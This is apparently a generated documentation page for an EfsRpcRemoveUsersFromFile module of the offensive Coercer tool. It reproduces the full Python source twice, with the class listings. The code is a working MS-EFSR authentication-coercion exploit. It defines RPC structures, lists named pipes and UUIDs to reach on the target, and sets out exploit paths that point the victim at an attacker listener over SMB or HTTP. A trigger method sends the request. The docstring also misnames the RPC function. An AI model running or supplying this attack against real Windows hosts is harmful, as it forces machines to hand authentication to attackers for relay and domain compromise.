coercer.methods.MS_EFSR.EfsRpcRemoveUsersFromFile
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : EfsRpcRemoveUsersFromFile.py 4# Author : XiaoliChan 5# Date created : 18 Mar 2023 6 7 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 9from coercer.network.DCERPCSessionError import DCERPCSessionError 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13class EFS_HASH_BLOB(NDRSTRUCT): 14 15 structure = ( 16 ('Data', DWORD), 17 ('cbData', PCHAR), 18 ) 19 20class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 21 structure = ( 22 ('Lenght', DWORD), 23 ('SID', RPC_SID), 24 ('Hash', EFS_HASH_BLOB), 25 ('Display', LPWSTR), 26 ) 27 28class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT): 29 align = 1 30 structure = ( 31 ('Cert', DWORD), 32 ('Users', ENCRYPTION_CERTIFICATE_HASH), 33 ) 34 35class _EfsRpcRemoveUsersFromFile(NDRCALL): 36 """ 37 Structure to make the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/28609dad-5fa5-4af9-9382-18d40e3e9dec) 38 """ 39 opnum = 8 40 structure = ( 41 ('FileName', WSTR), 42 ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST) 43 ) 44 45class _EfsRpcRemoveUsersFromFileResponse(NDRCALL): 46 """ 47 Structure to parse the response of the RPC call to EfsRpcRemoveUsersFromFile() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 48 """ 49 structure = () 50 51 52class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL): 53 """ 54 Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 55 56 Method found by: 57 - [@topotam77](https://twitter.com/topotam77) 58 """ 59 60 exploit_paths = [ 61 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 62 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 63 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 64 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 65 ] 66 67 access = { 68 "ncan_np": [ 69 { 70 "namedpipe": r"\PIPE\efsrpc", 71 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 72 "version": "1.0" 73 }, 74 { 75 "namedpipe": r"\PIPE\lsarpc", 76 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 77 "version": "1.0" 78 }, 79 { 80 "namedpipe": r"\PIPE\samr", 81 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 82 "version": "1.0" 83 }, 84 { 85 "namedpipe": r"\PIPE\lsass", 86 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 87 "version": "1.0" 88 }, 89 { 90 "namedpipe": r"\PIPE\netlogon", 91 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 92 "version": "1.0" 93 }, 94 ], 95 "ncacn_ip_tcp": [ 96 { 97 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 98 "version": "1.0" 99 }, 100 { 101 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 102 "version": "1.0" 103 } 104 ] 105 } 106 107 protocol = { 108 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 109 "shortname": "MS-EFSR" 110 } 111 112 function = { 113 "name": "EfsRpcRemoveUsersFromFile", 114 "opnum": 8, 115 "vulnerable_arguments": ["FileName"] 116 } 117 118 def trigger(self, dcerpc_session, target): 119 if dcerpc_session is not None: 120 try: 121 request = _EfsRpcRemoveUsersFromFile() 122 request['FileName'] = self.path 123 resp = dcerpc_session.request(request) 124 return "" 125 except Exception as err: 126 return err 127 else: 128 print("[!] Error: dce is None, you must call connect() first.") 129 return None
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
14class EFS_HASH_BLOB(NDRSTRUCT): 15 16 structure = ( 17 ('Data', DWORD), 18 ('cbData', PCHAR), 19 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
21class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT): 22 structure = ( 23 ('Lenght', DWORD), 24 ('SID', RPC_SID), 25 ('Hash', EFS_HASH_BLOB), 26 ('Display', LPWSTR), 27 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- align
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
class
ENCRYPTION_CERTIFICATE_HASH_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
29class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT): 30 align = 1 31 structure = ( 32 ('Cert', DWORD), 33 ('Users', ENCRYPTION_CERTIFICATE_HASH), 34 )
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Cert', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
Inherited Members
- impacket.dcerpc.v5.ndr.NDR
- NDR
- referent
- commonHdr
- commonHdr64
- structure64
- item
- fields
- changeTransferSyntax
- getDataLen
- isNDR
- dumpRaw
- dump
- calculatePad
- pack
- unpack
- impacket.dcerpc.v5.ndr.NDRSTRUCT
- getData
- fromString
- getAlignment
- impacket.dcerpc.v5.ndr.NDRCONSTRUCTEDTYPE
- isPointer
- isUnion
- getDataReferents
- getDataReferent
- calcPackSize
- getArrayMaximumSize
- getArraySize
- fromStringReferents
- fromStringReferent
- calcUnPackSize
53class EfsRpcRemoveUsersFromFile(MSPROTOCOLRPCCALL): 54 """ 55 Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31) 56 57 Method found by: 58 - [@topotam77](https://twitter.com/topotam77) 59 """ 60 61 exploit_paths = [ 62 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), 63 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), 64 ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), 65 ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'), 66 ] 67 68 access = { 69 "ncan_np": [ 70 { 71 "namedpipe": r"\PIPE\efsrpc", 72 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 73 "version": "1.0" 74 }, 75 { 76 "namedpipe": r"\PIPE\lsarpc", 77 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 78 "version": "1.0" 79 }, 80 { 81 "namedpipe": r"\PIPE\samr", 82 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 83 "version": "1.0" 84 }, 85 { 86 "namedpipe": r"\PIPE\lsass", 87 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 88 "version": "1.0" 89 }, 90 { 91 "namedpipe": r"\PIPE\netlogon", 92 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 93 "version": "1.0" 94 }, 95 ], 96 "ncacn_ip_tcp": [ 97 { 98 "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d", 99 "version": "1.0" 100 }, 101 { 102 "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e", 103 "version": "1.0" 104 } 105 ] 106 } 107 108 protocol = { 109 "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol", 110 "shortname": "MS-EFSR" 111 } 112 113 function = { 114 "name": "EfsRpcRemoveUsersFromFile", 115 "opnum": 8, 116 "vulnerable_arguments": ["FileName"] 117 } 118 119 def trigger(self, dcerpc_session, target): 120 if dcerpc_session is not None: 121 try: 122 request = _EfsRpcRemoveUsersFromFile() 123 request['FileName'] = self.path 124 resp = dcerpc_session.request(request) 125 return "" 126 except Exception as err: 127 return err 128 else: 129 print("[!] Error: dce is None, you must call connect() first.") 130 return None
Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol
Method found by:
exploit_paths =
[('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
119 def trigger(self, dcerpc_session, target): 120 if dcerpc_session is not None: 121 try: 122 request = _EfsRpcRemoveUsersFromFile() 123 request['FileName'] = self.path 124 resp = dcerpc_session.request(request) 125 return "" 126 except Exception as err: 127 return err 128 else: 129 print("[!] Error: dce is None, you must call connect() first.") 130 return None